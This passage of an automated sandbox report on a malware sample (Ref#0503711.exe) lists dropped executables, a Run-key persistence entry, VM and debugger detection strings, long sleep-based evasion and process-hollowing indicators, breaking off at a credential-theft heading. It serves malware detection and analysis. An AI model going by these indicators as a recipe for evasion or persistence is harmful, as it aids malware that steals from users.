                      Source: Yara match File source: Process Memory Space: tmp2083.tmp.exe PID: 7652, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: tmp2083.tmp.exe PID: 7692, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_0197E015 push esp; retf 0_2_0197E019
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_0197DA78 push edi; retf 0_2_0197DA79
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_05E83291 push FFFFFFC7h; ret 0_2_05E83293
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_05E83A91 push FFFFFFBFh; ret 0_2_05E83A93
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060A071F push es; ret 0_2_060A0730
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060AD1F2 push edx; ret 0_2_060AD1FD
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060B29E0 push es; ret 0_2_060B2A90
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060C3EBC push ss; ret 0_2_060C3EBF
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_06211427 push es; iretd 0_2_06211428
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_06213C54 push fs; ret 0_2_06213C5F
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_06211F35 push es; ret 0_2_06211F38
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_063435AF push ebp; retf 0_2_063435B2
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe Code function: 1_2_00BD2C8B push ds; ret 1_2_00BD2C92
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 2_2_012C0C55 push edi; retf 2_2_012C0C7A
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Code function: 3_2_05B93E77 push edx; ret 3_2_05B93E7A
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Code function: 4_2_017C3301 push cs; ret 4_2_017C3305
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Code function: 4_2_017C3E26 push E9000000h; retf 4_2_017C3E31
                      Source: Ref#0503711.exe Static PE information: section name: .text entropy: 7.6840259996063836
                      Source: 0.2.Ref#0503711.exe.5d30000.10.raw.unpack, xPUceZiaJq5d1uh9UQG.csHigh entropy of concatenated method names: 'pMPi6qvaJB', 'U0tgRDmzyRbcgY9k5ih', 'd5WfDbtuhgUUTV4436T', 'EhIDgUmBrOjXtwL0c0y', 'EbFeYamA6tTSH303B76', 'bhc9Vhm8vwpFf6ixZBy', 'UVccM3mX1CTguyBleJf'
                      Source: 0.2.Ref#0503711.exe.5d30000.10.raw.unpack, KgaJdhi9yCnBKYwNKut.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'LH0i2xwXK5', 'NtProtectVirtualMemory', 'jWJG39m7SaPVsfau3UY', 'hyQXBnm6HbCDuR2bThv', 'FH6oMJmTTaDuFtyqEYp', 'ui0Wl7m1Xh2V2otOOqg'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, Gw56uEORyyixGR93gyN.csHigh entropy of concatenated method names: 'R8kOYurBG5', 'U4SxKxPgor3u7OmWZMc', 'NvbPc7PQXjEpMpUd06X', 'EBFgyrPw0wkScxNZ7Kr', 'BRWAOdP3lwKRTmirqti', 'iwk936P8lltU1lG84ko', 'gYCXDxPXEDsZw26Ky11', 'geLis7PIcGJi3QKRbsm', 'bpagOJPnXBSpWP2oQ2x', 'IhSbpXPf1tnpDLqJ9aY'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'j1OxApHAR8qj4r23RCv'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, MLbCVQdG2K75TIZp2T7.csHigh entropy of concatenated method names: 'CcEdeDClcp', 'TI0dhOCucT', 'kXpsWLHbEcZwqb4f0Aw', 'T9YiYHHJQrgBYIef4Kf', 'uJvaGuHMxatnbIRKkjS', 'YdDwmAHuCeKLXA75EN3', 'pJb7anHvQroLhn1Ib9G', 'klvXJtHS2JBIcDF4TnE', 'M4NeugHi8pUxo1Yw4NO', 'UxOZcmHsPkmp6kMbQi4'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, v5Bi7mdJHDtycDxIQnT.csHigh entropy of concatenated method names: 'D5kdSZwNko', 'hFEdirA2xk', 'o8qdL30rby', 'j4bsjgaTkAfsdSoQHox', 'ITqMG5aY7YbjEPhfLae', 'elr30Wa6vpMC9MNIHvR', 'Ium8HMa7TcowObKlE5D', 'P7eNW6a1T5UW9hwKu4S'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, QQ3beRddoYX4CnPXHDZ.csHigh entropy of concatenated method names: 'fxtdNbFNDh', 'pHdMkuagA6Sfa2RA70p', 'WcBMEYaQrTIR2RJBPbn', 'T7h5YoawkgFxEc9GZCy', 'o7qNMra3jT3QVuDiaQu', 'zFGIIca8PHVDx7i4hbi', 'uSO7wGaXuACOY19hXxN', 'atJqAEanDfhsufJG4at', 'TvdCBIafj1yq4Z6RNTF'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, KgaJdhi9yCnBKYwNKut.cs, High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'LH0i2xwXK5', 'NtProtectVirtualMemory', 'jWJG39m7SaPVsfau3UY', 'hyQXBnm6HbCDuR2bThv', 'FH6oMJmTTaDuFtyqEYp', 'ui0Wl7m1Xh2V2otOOqg'
                      Source: C:\Users\user\Desktop\Ref#0503711.exe, File created: C:\Users\user\AppData\Local\Temp\docdd.exe
                      Source: C:\Users\user\Desktop\Ref#0503711.exe, File created: C:\Users\user\AppData\Roaming\ioibrzb.exe
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe, File created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe
                      Source: C:\Users\user\Desktop\Ref#0503711.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ioibrzb
                      Source: C:\Users\user\Desktop\Ref#0503711.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\Ref#0503711.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Ref#0503711.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: tmp2083.tmp.exe PID: 7652, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 1970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 3410000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 5410000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeMemory allocated: 4700000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 17C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 5230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 3000000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999779Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999561Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999452Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999122Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999009Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998906Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998793Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998687Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998469Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998006Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997889Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997777Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997665Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997499Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997379Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeWindow / User API: threadDelayed 1625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeWindow / User API: threadDelayed 3487Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWindow / User API: threadDelayed 2404Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWindow / User API: threadDelayed 1985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -3000000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7552Thread sleep count: 1625 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7552Thread sleep count: 3487 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999779s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999561s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999452s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999122s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999009s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998793s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998006s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997889s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997777s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997665s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997499s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997379s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997219s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7532Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7608Thread sleep count: 2404 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7608Thread sleep count: 1985 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99780s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99447s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99340s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99183s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99070s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98905s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98784s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98514s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98381s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98246s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98139s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98026s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97920s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97689s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97548s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97308s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97202s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97075s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99780Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99562Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99447Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99340Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99183Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99070Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98905Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98784Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98625Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98514Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98381Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98246Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98139Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98026Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97920Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97812Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97689Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97548Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97421Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97308Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97202Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97075Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: CompanyNameVMware, Inc.D
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: ProductNameVMware Workstation>
                      Source: docdd.exe, 00000001.00000002.1727611492.0000000000C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware, Inc.
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: CommentsVMware Player:
                      Source: Ref#0503711.exe, 00000002.00000002.2914646744.00000000011EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                      Source: tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: docdd.exe, 00000001.00000002.1727611492.0000000000C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: docdd.exe, 00000001.00000002.1752498507.0000000005C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NameVMware Wor
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware, Inc.1
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware, Inc.0
                      Source: tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware Workstation%
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: FileDescriptionVMware Player:
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: noreply@vmware.com
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware Player
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware Workstation
                      Source: docdd.exe, 00000001.00000002.1727611492.0000000000C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: docdd.exe, 00000001.00000002.1752498507.0000000005C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sVMware Player:
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory written: C:\Users\user\Desktop\Ref#0503711.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory written: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\AppData\Local\Temp\docdd.exe "C:\Users\user\AppData\Local\Temp\docdd.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\Desktop\Ref#0503711.exe "C:\Users\user\Desktop\Ref#0503711.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Users\user\Desktop\Ref#0503711.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\docdd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

